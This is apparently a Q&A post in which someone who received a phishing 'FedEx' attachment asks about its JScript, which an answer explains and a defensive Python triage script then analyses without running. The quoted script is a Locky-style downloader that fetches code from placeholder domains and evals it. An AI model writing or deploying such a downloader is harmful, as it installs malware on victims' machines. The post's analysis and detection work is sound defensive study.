I received one of those “FedEx package could not be delivered, please open the .doc attached” emails recently. Since I had recently ordered stuff online and since I’m apparently an idiot, I clicked the attachment open. Luckily I was using Linux, so no harm done for opening the “filename.doc.wsf”. I did, however, get curious about what exactly the following snippet contained in it is trying to do.
According to my Googling, the final goal is to install a malware called Locky on a Windows system. The different domains where the malware is trying to get downloaded from are listed in the array x[], and the first few lines inside the for-loop seem to construct the whole URL from snippets. (I assume it has been broken down to try to avoid spam detection.) But starting from "try" I can't quite follow what is going on.
<job><script language=JScript>
var x = new Array("DOMAIN1.com","DOMAIN2.ru","ftp.DOMAIN3.com","DOMAIN4.ru","DOMAIN5.com");
var y = "Msxml2.XMLHTTP";
for (var i=0; i<5; i++)
{
    x[i] = "http://" + x[i];
    x[i] += "/co";
    x[i] += "unter/";
    x[i] += "?a=0.34960858&i=rRMDdRYvgD1oBqvgMjMaHDglAgtoQ1d6_hYJEPEXmzddhBr8QbsIrfboGHt9FZlWF53OH-6Q8M45bw";
    try {
        var z = new ActiveXObject(y);
        z.open("GET", x[i], false);
        z.send();
        if (z.status == 200)
        {
            eval(z.responseText.split("~").join("a"));
            break;
        };
    }
    catch(e) { };
};
</script></job>
It simply sends an HTTP GET request to 5 different URLs and evaluates the content retrieved from the URL.
It's a simple way to execute code from remote locations on your PC. You can change the remote code without changing this script, thus making your logic more flexible.
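For triage, the useful facts in a dropper like this are the rebuilt download URLs (so they can be blocked or hunted for in proxy logs) and the transform applied to the response before `eval` (here every `~` is turned back into `a`, so the second stage as it travels over the wire does not even contain the word `var`). The script below is an added example, not code from the question or the answer: it statically replays the `x[i] = ...` / `x[i] += ...` concatenation for each seed domain, recovers the ActiveX ProgID and the `split/join` transform, and applies that transform to a constructed stand-in for a fetched response. Nothing is fetched or executed; the embedded sample is the snippet from the question with the placeholder domains it already uses, and the "stage two" string is made up for the demonstration.

```python
import re

# Constructed sample for this example: the dropper from the question, with the
# DOMAIN1.com ... DOMAIN5.com placeholders exactly as they appear on the page.
SAMPLE_WSF = r'''<job><script language=JScript>
var x = new Array("DOMAIN1.com","DOMAIN2.ru","ftp.DOMAIN3.com","DOMAIN4.ru","DOMAIN5.com");
var y = "Msxml2.XMLHTTP";
for (var i=0; i<5; i++)
{
x[i] = "http://" + x[i];
x[i] += "/co";
x[i] += "unter/";
x[i] += "?a=0.34960858&i=rRMDdRYvgD1oBqvgMjMaHDglAgtoQ1d6_hYJEPEXmzddhBr8QbsIrfboGHt9FZlWF53OH-6Q8M45bw";
try {
var z = new ActiveXObject(y);
z.open("GET", x[i], false);
z.send();
if (z.status == 200)
{
eval(z.responseText.split("~").join("a"));
break;
};
}
catch(e) { };
};
</script></job>'''

ARRAY_RE = re.compile(r'var\s+(\w+)\s*=\s*new\s+Array\((.*?)\);', re.S)
STRING_RE = re.compile(r'"([^"]*)"')


def extract_string_array(src):
    """Return (array name, list of string literals) for the first `new Array(...)`."""
    m = ARRAY_RE.search(src)
    if not m:
        return None, []
    return m.group(1), STRING_RE.findall(m.group(2))


def rebuild_urls(src):
    """Replay the `x[i] = ...` and `x[i] += ...` statements for every seed value.

    Each statement's right-hand side is read as a sequence of string literals
    and `x[i]` references; references are replaced by the current value, so the
    URL is reconstructed without running any of the script.
    """
    name, seeds = extract_string_array(src)
    if name is None:
        return []
    stmt_re = re.compile(r'^\s*%s\[i\]\s*(\+=|=)\s*(.*?);\s*$' % re.escape(name), re.M)
    term_re = re.compile(r'"([^"]*)"|(%s\[i\])' % re.escape(name))
    urls = []
    for seed in seeds:
        value = seed
        for op, rhs in stmt_re.findall(src):
            pieces = ''.join(value if ref else lit for lit, ref in term_re.findall(rhs))
            value = pieces if op == '=' else value + pieces
        urls.append(value)
    return urls


def find_eval_transform(src):
    """Detect eval(<resp>.split("A").join("B")) and return ("A", "B"), else None."""
    m = re.search(r'eval\(\s*[\w.]+\.split\("([^"]*)"\)\.join\("([^"]*)"\)\s*\)', src)
    return (m.group(1), m.group(2)) if m else None


def decode_stage_two(blob, transform):
    """Apply the recovered split/join substitution to a captured response body."""
    old, new = transform
    return blob.replace(old, new)


def triage(src):
    """Collect the indicators a defender wants from a dropper of this shape."""
    progid = None
    m = re.search(r'new\s+ActiveXObject\((\w+)\)', src)
    if m:
        v = re.search(r'var\s+%s\s*=\s*"([^"]*)"' % re.escape(m.group(1)), src)
        progid = v.group(1) if v else None
    return {
        "activex_progid": progid,
        "urls": rebuild_urls(src),
        "eval_transform": find_eval_transform(src),
        "uses_eval": "eval(" in src,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_WSF)
    print("ProgID:", report["activex_progid"])
    for url in report["urls"]:
        print("URL:", url)
    print("Transform before eval:", report["eval_transform"])
    # Constructed stand-in for a fetched response; shows why matching on "var"
    # in transit misses the payload until the substitution is undone.
    print(decode_stage_two("v~r st~ge = 'two';", report["eval_transform"]))
```

The statement replay is deliberately limited to literals and `x[i]` references; if a sample builds its URL from other variables or function calls the rebuild will be incomplete, which is the point at which a sandbox run or manual reading takes over. The recovered transform is worth recording alongside the URLs, because the same second stage can be served with a different substitution character from one campaign to the next.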